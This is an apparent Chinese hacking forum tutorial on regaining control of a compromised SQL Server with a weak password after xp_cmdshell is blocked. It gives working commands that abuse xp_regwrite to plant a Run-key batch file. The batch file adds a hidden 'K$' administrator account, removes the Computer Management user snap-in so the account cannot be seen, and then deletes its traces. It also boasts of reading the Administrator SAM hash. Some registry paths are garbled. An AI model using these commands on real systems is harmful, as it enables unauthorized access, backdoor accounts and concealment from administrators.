如何突破无法sp_add xp_cmdshell的SQL
多时候我们的SQL弱口令的机器丢了,于是我们就准备用XP_CMDSHELL恢复,可是如果对方禁止了xp_cmdshell
了呢?也许很多人就把sp_addextendedproc这个存储过程给搬出来试试了,可惜,现在的管理员刁的很,连个xplog
70.DLL都不给留下.于是,我们抓抓头,没有办法了.
呵呵,对于这样的问题,我们一定会感到棘手,因为我们有了SQL的口令却觉得无从下手,的确是很尴尬.
其实,MS的SQL给了我们不止这些,其实它还给了我们更多的好东西,所以,今天我就告诉大家一个折中的办法.
先来复习复习一下这些SQL语句
先是
xp_regenumvalues 根键, 子键
上面这句就是显示注册表中的一个子键下的所有键值.呵呵,连注册表都上来啦~~
接下来是
xp_regwrite 根键,子键, 值名, 值类型, 值
这个就是危险的写入注册表的的扩展过程,HOHO,厉害吧~~
再就是
xp_regread 根键,子键,键值名
这个就是读某一个键值的扩展过程,它能读出连Windows自己都读不出的Administrator的Sam散列,华华,厉害吧?
手头上有了这样的武器,还怕什么?!
来!我们把肉鸡找回来!
但是,我们也要想想,我们现在是要加一个用户才能进3389之类需要密码的机器,但是怎么加用户?是不是需要从c
md里面加?那要怎么样呢?
其实很简单的..............但是方法是很烦琐又有点折忠的,而且势必引起管理员的注意,可是我们能用自己
的方法让管理员干瞪眼......OK,废话少说,先看下面的代码
cmd.exe /c echo net user K$ hacked /add > c:aa.bat
cmd.exe /c echo net localgroup administrators K$ /add >> c:aa.bat
cmd.exe /c echo REGEDIT4 >c:a.reg
cmd.exe /c echo [-HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] >>c:a.reg
cmd.exe /c echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] >>c:a.reg
cmd.exe /c echo "vptray"="c:progra~1
avvptray.exe" >> c:a.reg
cmd.exe /c echo "Internet Explore"="Iexplorer.exe" >> c:a.reg
cmd.exe /c echo "RavTime"="c:program files
ising
avRavtimer.exe" >>
c:a.reg[HKEY_LOCAL_MACHINESOFTWAREMicrosoftMMCNodeTypes{476E6448-AAFF-11D0-B944-00C04FD8D5B
0}ExtensionsNameSpace] >>c:a.reg
cmd.exe /c echo "{5D6179C8-17EC-11D1-9AA9-00C04FD8FE93}"- >>c:a.reg
cmd.exe /c echo regedit.exe -s c:a.reg >> c:aa.bat
cmd.exe /c c:aa.bat
cmd.exe /c echo del c:aa.bat
cmd.exe /c echo del c:a.reg
呵呵,很简单吧?唯一不清楚的就是这个{5D6179C8-17EC-11D1-9AA9-00C04FD8FE93}ActiveX的高速缓寸,其实它
就是"计算机管理"里面的"用户"所对应的键值,删除了,管理员也没办法了,而且,我们加的是高级的加$的没法从
CMD里看到的用户! :)
当然,删除的Run键值要和它里面的东西一起恢复回去.里面的东西嘛,就用xp_regenumvalues看好了.
这样就会有一个弊端,因为一旦管理员登入的时候,会一下子蹦出十几个cmd窗口,哇~~~怕怕~,但是等它一回过神
的时候,所以的东西已经清理完毕了,呵呵~~~~它会去检查啊,可惜他什么也查不出....
呵呵,对于上面的,我们只要用xp_regwrite HKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersionRun, a(bC啊都可以), reg_sz, cmd.exe /c c:aa.bat
这样的代码就可以得到用户了.
呵呵,很折中,但是很实用~~~
所以敬告管理员们,注册表这个Windows系统的核心可不要疏忽,一起把他们给sp_dropextendedproc好了